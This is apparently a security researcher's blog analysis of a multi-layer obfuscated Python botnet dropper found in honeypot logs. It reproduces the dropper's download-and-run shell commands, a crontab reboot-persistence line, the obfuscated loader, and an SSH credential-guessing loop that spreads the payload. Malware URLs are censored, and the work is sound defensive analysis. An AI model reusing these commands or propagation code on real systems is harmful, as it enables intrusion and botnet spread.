Deobfuscating multiple layers of malicious python
1. Background
One of my research projects analyzes large sets of honeypot logs in order to identify emerging trends in the Tactics, Techniques, and Procedures (TTPs) of deployed malware. A recent trend, reported by one of our daily statistical correlation tools, caught my eye and warranted further investigation. Since the results of my analysis may be of interest to others, here's a quick breakdown of one particular python rabbit hole. It's not amazingly complex, but it is far from simple, and it makes an interesting case study in the use of multiple layers of obfuscated python in malware.
2. Layer One: command line bash/ssh
The honeypot log in question turned up the following commands (formatted for readability), which started appearing at low levels on 2021-12-12. Other bot networks send similar commands hundreds or thousands of times a day, but this particular command is only caught a few times a day.
    cd /tmp
    (( apt update -y && apt install python3 wget -y ) || ( yum update -y && yum install epel-release -y && yum install python3 wget -y ))
    wget -O updater.zip [MALWAREURLCENSORED]
    python3 updater.zip
    rm updater.zip && cd ~
This part isn't anything special, of course: it's a simple downloader/dropper that first tries to make sure the tools it needs (python3 and wget) are installed. It does assume it's on a debian or redhat-like system, but otherwise will still work on other systems that have python3 and wget pre-installed (like many, if not most, *nix systems).
Outstanding question 1: Reading scripts like this always leaves me with random questions like: "what's the point of the final cd to $HOME?"
3. Layer Two: the downloaded python script
The python script that was downloaded (updater.zip above) is much more interesting (formatted for brevity and actual malware removal as well):
    import base64, codecs
    magic = 'aW1wb3J0IHN5cyx...BmbDoNCgkJCQlp'
    love = 'MvOhqlOcovOzoP5l...A0MJ1xYJkiM2yh'
    god = 'ZCIpDQoJCQlzeXMuZ...8gJycnKQ0KCQlh'
    destiny = 'LzZbWlpaVT1eM...tcQDbAPvNAPt0X'
    joy = '\x72\x6f\x74\x31\x33'
    trust = \
        eval('\x6d\x61\x67\x69\x63') + \
        eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29') + \
        eval('\x67\x6f\x64') + \
        eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29')
    eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))
First, to the author: good creative use of variable names.
So what does the above do?
- Creates 4 variables (magic … destiny) with base64 encoded strings.
- Creates a 5th variable (joy) containing the string "rot13", written as hexadecimal escape sequences.
- Creates a 6th variable (trust) by concatenating the results of multiple calls to eval(). Each input to eval() is further obfuscated by writing it as hexadecimal escape sequences to prevent (easy) human readability. The arguments of these eval() calls are really:
  - the string 'magic', thus resulting in the contents of the magic variable
  - codecs.decode(love, joy), which applies the rot13 substitution algorithm to the contents of the love variable
  - the string 'god', resulting in the contents of the god variable
  - codecs.decode(destiny, joy), and thus the rot13-decoded contents of the destiny variable
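The hex-escaped arguments can be checked without running any of the malware. The sketch below copies the escaped strings from the script above into raw string literals (so the backslashes survive as text) and decodes them; the helper name reveal is my own, not something from the sample.

```python
# Escaped strings copied from the dropper; raw literals keep the backslashes as text.
obfuscated = [
    r'\x6d\x61\x67\x69\x63',
    r'\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29',
    r'\x67\x6f\x64',
    r'\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29',
    r'\x72\x6f\x74\x31\x33',
    r'\x74\x72\x75\x73\x74',
]


def reveal(escaped: str) -> str:
    """Turn literal \\xNN escape text into the characters it stands for (hypothetical helper)."""
    return escaped.encode("ascii").decode("unicode_escape")


decoded = [reveal(s) for s in obfuscated]
for text in decoded:
    print(text)
```

Nothing here is evaluated; the strings are only decoded and printed, which is all that is needed to read the author's intent.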
Summarizing for readability, the trust assignment line becomes:
    trust = \
        magic + \
        codecs.decode(love, joy) + \
        god + \
        codecs.decode(destiny, joy)
The final content of the trust variable is a base64 string of 1824 characters. This is fed to base64.b64decode(), and the result, which is yet another python script, is then compiled and executed.
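For analysis, the same reassembly can be done while replacing the final eval(compile(...)) with a plain print. The following is a minimal sketch of that idea, assuming the four-string layout described above; rebuild_payload is a hypothetical name, and the sample data is a harmless stand-in that I encode the same way, since the real strings are elided in this post.

```python
import base64
import codecs


def rebuild_payload(magic: str, love: str, god: str, destiny: str) -> str:
    """Reassemble and decode the next layer WITHOUT executing it."""
    trust = (
        magic
        + codecs.decode(love, "rot13")
        + god
        + codecs.decode(destiny, "rot13")
    )
    return base64.b64decode(trust).decode("utf-8", errors="replace")


# Harmless stand-in for the next layer, obfuscated the same way for demonstration.
sample = "import sys\nprint('hello from the next layer')\n"
encoded = base64.b64encode(sample.encode("utf-8")).decode("ascii")
q = len(encoded) // 4
parts = [encoded[:q], encoded[q:2 * q], encoded[2 * q:3 * q], encoded[3 * q:]]

magic, god = parts[0], parts[2]
love = codecs.encode(parts[1], "rot13")      # second piece is rot13-wrapped
destiny = codecs.encode(parts[3], "rot13")   # fourth piece is rot13-wrapped

recovered = rebuild_payload(magic, love, god, destiny)
print(recovered)  # inspect the source instead of running it
```

Because rot13 only rotates letters, the rot13-wrapped pieces still look like base64 at a glance, which is presumably why the author alternated the two encodings.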
4. Layer Three: the embedded, evaluated python script
The output of the previous step is a longer string of python code that is passed to compile and eval to run the following code (edited for formatting and malware URL removal). I'll break this longer script into chunks.
First, the top few lines import modules and define the nw variable, setting it to "12", which I'll get back to in a minute.
    import sys,os,subprocess,time
    nw="12"
After that come a number of functions that are just filler, from what I can tell, as they're never actually used:
    def a(b):
        c = b*2
        return c
    def oO1oO(OO):
        OOO = 0
        return OO
    def oOOOO2(OO):
        OOO = 0
        return OO
    def oOo1(OO):
        OOO = 0
        return OO
Next there is one more defined function, which actually is used, and is just a wrapper around os.system() to ensure it continues in case of any exceptions being thrown:
    def abc(cl):
        try:
            os.system(cl)
        except:
            pass
Finally comes the meat of the script, which starts by checking if a /opt/lsb/.pki file exists on the system being penetrated and if it contains the string from the nw variable above ("12"). It sets the ald variable to 1 if the file exists and contains "12", and to 0 otherwise.
The importance of the ald variable will become apparent in a minute. I'll also question the need for the while True component of this script at the end of this section.
    while True:
        try:
            ald = 0
            try:
                with open('/opt/lsb/.pki', "r+") as fl:
                    if nw in fl.read():
                        ald = 1
                    else:
                        ald = 0
            except:
                ald = 0
Next, the script similarly sets a crn variable to 1 if a cronjob has already been configured that executes the final malware binary fuse (as we will see a bit later).
            crn = 0
            try:
                cron = subprocess.check_output("crontab -l",shell=True).decode('utf-8')
                if "fuse" in cron:
                    crn = 1
                else:
                    crn = 0
            except:
                crn = 0
Now that the script has properly probed the system for components of its previous runs, it can actually do something with the results. First, it checks to see if the ald variable indicates that "12" was in the /opt/lsb/.pki file:
            if ald == 1:
                print("[1]- Stopped /usr/lib/systemd/systemd-logind")
                sys.exit()
This check functions as a crude version check: it lets previously compromised systems be upgraded, while systems already running the current version skip the installation. Thus, if the author changed the string in the nw variable to "13" but "12" was stored in /opt/lsb/.pki, the rest of the script would continue running to self-update to the latest and greatest malware.
Outstanding question: what's the purpose of this print message?
Note/Bug: Because of the way string searching is used for "12", it would also match "112" and any other string containing "12"; the version handling isn't as robust as it could be. But I'm certainly being picky here in my code review.
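To make the substring issue concrete, here is a small sketch comparing the dropper's style of check with a stricter one. The marker format 'keys-0 {}' comes from the script itself; the function names and the stricter comparison are my own illustration, not something the malware does.

```python
def loose_match(version: str, file_text: str) -> bool:
    """Mirrors the dropper's check: a plain substring search."""
    return version in file_text


def strict_match(version: str, file_text: str) -> bool:
    """Hypothetical stricter variant: compare the last whitespace-separated field."""
    fields = file_text.split()
    return bool(fields) and fields[-1] == version


marker = "keys-0 112\n"  # what the marker file would hold for a version "112"
print(loose_match("12", marker))   # substring search also matches "112"
print(strict_match("12", marker))  # exact field comparison does not
```

With the loose check, a host marked with version "112" would be treated as already running "12" and never updated.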
Next up, the script installs fuse with apt or yum, kills any running process named fuse, and removes any existing fuse binary from /usr/sbin:
            abc(''' apt install fuse python3 -y || yum install epel-release python3 fuse -y ''')
            abc(''' pkill fuse; rm /usr/sbin/fuse -R ''')
Afterward, if there is no cron job installed to re-run the fuse binary at reboot, it adds a crontab entry to do so. (Again, the previous check for the string "fuse" in any cronjob will probably produce some false positives.)
            if crn == 0:
                abc('''(crontab -l 2>/dev/null || true; echo "@reboot pkill updated;nohup /usr/sbin/fuse>/dev/null &") | crontab - ''')
Next, the script creates the /opt/lsb/.pki version number file:
            abc(''' rm -R /opt/lsb/ ''')
            abc(''' mkdir /opt/lsb/ && echo 'keys-0 {}'>/opt/lsb/.pki '''.format(nw))
Finally, we get to the actual fuse malware downloading, installing and initial run. Again, we see the script using print to log a fake stopped message for systemd-logind for some reason.
            abc(''' wget -O /usr/sbin/fuse [MALWAREURLCENSORED] && chmod +x /usr/sbin/fuse''')
            abc(''' nohup /usr/sbin/fuse>/dev/null & ''')
            print("[1]+ Stopped /usr/lib/systemd/systemd-logind")
            sys.exit()
        except:
            sys.exit()
One final Outstanding question: why the while True portion of the script? There is no portion of the script that does not result in sys.exit() being called, which means the while loop should only ever be run once anyway.
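The single-pass behaviour is easy to confirm with a stripped-down loop of the same shape. This is only a sketch: the function and the iterations list are my own stand-ins, and the outer try/except exists purely so the demonstration can report a count instead of exiting.

```python
import sys


def dropper_shaped_loop(iterations: list) -> None:
    """Same control flow as the dropper, with the real work replaced by a counter."""
    while True:
        try:
            iterations.append(1)  # stand-in for the install steps
            sys.exit()            # every path in the real script ends like this
        except:                   # a bare except also catches SystemExit...
            sys.exit()            # ...but exits again, so the loop never repeats


iterations = []
try:
    dropper_shaped_loop(iterations)
except SystemExit:
    pass  # swallowed here only so the count can be printed

print(len(iterations))  # 1
```

Even an unexpected exception inside the try block lands in the bare except and exits, so there is no path back to the top of the loop.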
5. Layer Four: compiled python
The final /usr/sbin/fuse binary that is installed is also a python script, but has been compiled into a linux ELF binary. We can determine this by examining it using strings and/or objdump -D and noticing a pydata section in the ELF dump output. This pydata section contains a compiled python (pyc) formatted block, with a 16 byte header showing that a recent version of python was used to compile it.
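For reference, a 16 byte pyc header (the layout used since Python 3.7) can be picked apart with a few lines of python. This is a generic sketch rather than the exact procedure I used on the sample: parse_pyc_header is a hypothetical helper, and the demo header is built from the running interpreter's own magic number plus arbitrary values.

```python
import importlib.util
import struct


def parse_pyc_header(header: bytes) -> dict:
    """Split a 16-byte pyc header into its fields (hypothetical helper)."""
    if len(header) < 16:
        raise ValueError("need at least 16 bytes")
    magic = header[:4]
    (flags,) = struct.unpack("<I", header[4:8])
    info = {
        # The first two bytes are a little-endian number tied to the python version.
        "magic_number": int.from_bytes(magic[:2], "little"),
        "flags": flags,
        "matches_this_interpreter": magic == importlib.util.MAGIC_NUMBER,
    }
    if flags & 0x1:
        # Hash-based pyc: the last 8 bytes are a hash of the source file.
        info["source_hash"] = header[8:16].hex()
    else:
        # Timestamp-based pyc: source mtime and source size, 4 bytes each.
        info["mtime"], info["source_size"] = struct.unpack("<II", header[8:16])
    return info


# Demo header: this interpreter's magic, flags=0, arbitrary mtime and size.
demo = importlib.util.MAGIC_NUMBER + struct.pack("<III", 0, 1639267200, 1234)
info = parse_pyc_header(demo)
print(info)
```

Comparing the magic number against a table of known values is what ties a header to a specific python release.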
We next extract this pydata section in order to extract the compiled python byte code.
    objcopy -O binary --only-section=pydata \
        --set-section-flags pydata=alloc fuse fuse-pythoncode.bin
We can use pyinstaller's archive_viewer.py command to list and extract the pieces of the saved pydata section:
    cd pyinstaller
    PYTHONPATH=. python3 \
        ./PyInstaller/utils/cliutils/archive_viewer.py -b ../fuse-pythoncode.bin | head -15
['struct', 'pyimod01_os_path', 'pyimod02_archive', 'pyimod03_importers', 'pyimod04_ctypes', 'pyiboot01_bootstrap', 'pyi_rth_pkgutil', 'pyi_rth_multiprocessing', 'pyi_rth_inspect', 'fuse', '_cffi_backend.cpython-39-x86_64-linux-gnu.so', 'bcrypt/_bcrypt.abi3.so', 'cryptography/hazmat/bindings/_openssl.abi3.so', 'cryptography/hazmat/bindings/_padding.abi3.so', 'lib-dynload/_asyncio.cpython-39-x86_64-linux-gnu.so', 'lib-dynload/_bz2.cpython-39-x86_64-linux-gnu.so', 'lib-dynload/_codecs_cn.cpython-39-x86_64-linux-gnu.so', 'lib-dynload/_codecs_hk.cpython-39-x86_64-linux-gnu.so', 'lib-dynload/_codecs_iso2022.cpython-39-x86_64-linux-gnu.so', 'lib-dynload/_codecs_jp.cpython-39-x86_64-linux-gnu.so',
We note that fuse is also the name of the actual final python block to be executed, so we extract this as well using archive_viewer.py's X command. But it appears to be C-compiled cpython code, so decoding it is a bit trickier. However, we're in luck because the developer wasn't as smart as they could have been: if we run strings on the extracted file, we see 4 base64 encoded strings in the output. Like before, 2 of these are rot13 encoded. We can then combine them using the same techniques as the previous four strings above (magic … destiny).
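The strings step can also be approximated in python by scanning the extracted block for long runs of base64 characters. This is a rough sketch under my own assumptions: the 40-character minimum is arbitrary, find_base64_runs is a hypothetical helper, and the blob is a synthetic stand-in rather than the real fuse block.

```python
import base64
import re


def find_base64_runs(blob: bytes, min_len: int = 40) -> list:
    """Return long runs of base64-alphabet bytes found in a binary blob."""
    pattern = re.compile(rb"[A-Za-z0-9+/]{%d,}={0,2}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(blob)]


# Synthetic stand-in: binary noise wrapped around one embedded base64 string.
payload = base64.b64encode(b"print('stand-in for an embedded script')")
blob = b"\x7fELF\x00\x01" + payload + b"\x00\xff.text\x00"

runs = find_base64_runs(blob)
print(runs)
print(base64.b64decode(runs[0]).decode("utf-8"))
```

Since rot13 maps letters to letters, rot13-wrapped base64 still matches this pattern; the strings that fail to decode to readable text are the ones to run through rot13 first.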
6. Layer Five: the final python bot code
After decoding these 4 additional base64 encoded strings, we get an 845-line python bot script with the following functions in it:
grep 'def ' final-packaged-python.py
    def encrypt(data,key):
    def decrypt(data,key):
    def litehash(data):
    def getProxy():
    def getRandomPayload(size):
    def getRandomString(size):
    def pack_varint(val):
    def pack_str(bb):
    def getSocket(ip, port,ifprox,recons,proxyHost=False,proxyPort=0):
    def getSSL(sock, host):
    def loader(addr):
    def scan():
    def http_get(task_name, url, host, ip, port,ifprox, rcns):
    def http_fast(task_name, url, host, ip, port,ifprox, rcns):
    def mccrash(task_name,ip,port,hostn,ifprox, rcns):
    def mcbot(task_name,ip,port,hostn,ifprox, rcns):
    def mcping(task_name,ip,port,ifprox, rcns):
    def mcdata(task_name,ip,port,hostn,ifprox, rcns):
    def junk(task_name,ip,port,ifprox, rcns):
    def handshake(task_name,ip,port,ifprox, rcns):
    def tcp(task_name,ip,port,size,ifprox, rcns):
    def netty(task_name,ip,port,pkt,ifprox, rcns):
    def raknet(task_name,ip,port):
    def vse(task_name,ip,port):
    def udp(task_name,ip,port,size):
    def getHTTP(base):
    def download_file(url, file):
    def attack(method,ip,port,size,threads,times, ifprox, rcns):
    def getIP():
    def execer(cmd):
    def updateProxy(url):
As we can see from this set of functions, we've finally hit the end of the obfuscation train, revealing a general daemon containing various implements of destruction. Included in this final malware toolkit is the original payload delivery string we started with at the top of this post:
payload = "cd /tmp; ... python3 updater.zip && rm updater.zip && cd ~ "
Along with it, the code to deliver it over SSH:
    for i in credentials:
        try:
            ssh = paramiko.SSHClient()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            ssh.connect(addr, username=i[0], password=i[1])
            stdin, stdout, stderr = ssh.exec_command(f'cat /proc/1')
            if str(stdout.read()).split('b\'')[1] != '':
                i, o, e = ssh.exec_command(payload)
                time.sleep(10)
                break
            ssh.close()
        except Exception as E:
            #print(E)
            time.sleep(1)
            continue
7. Final comments
All in all, this was an interesting trail to analyze – it demonstrates the greater level of obfuscation more talented malicious actors will use, beyond what the basic script kiddies will.
Does this (still simple-ish) type of obfuscation technique work? Yes. It almost certainly raises the author above the low-hanging fruit of average malware collection systems. For example, none of the scripts or files above appear in the industry's leading database (VirusTotal) as of the date this analysis was completed. I submitted the final python payload to VirusTotal as well, but all of the engines report "Undetected" and thus not malicious in nature – clearly an error.
The slowly increasing usage of python in active malicious actor communities will hopefully trigger more malware detection engines to beef up their automated algorithms. Hopefully.
Acknowledgments: thank you to Robert Story for reviewing this!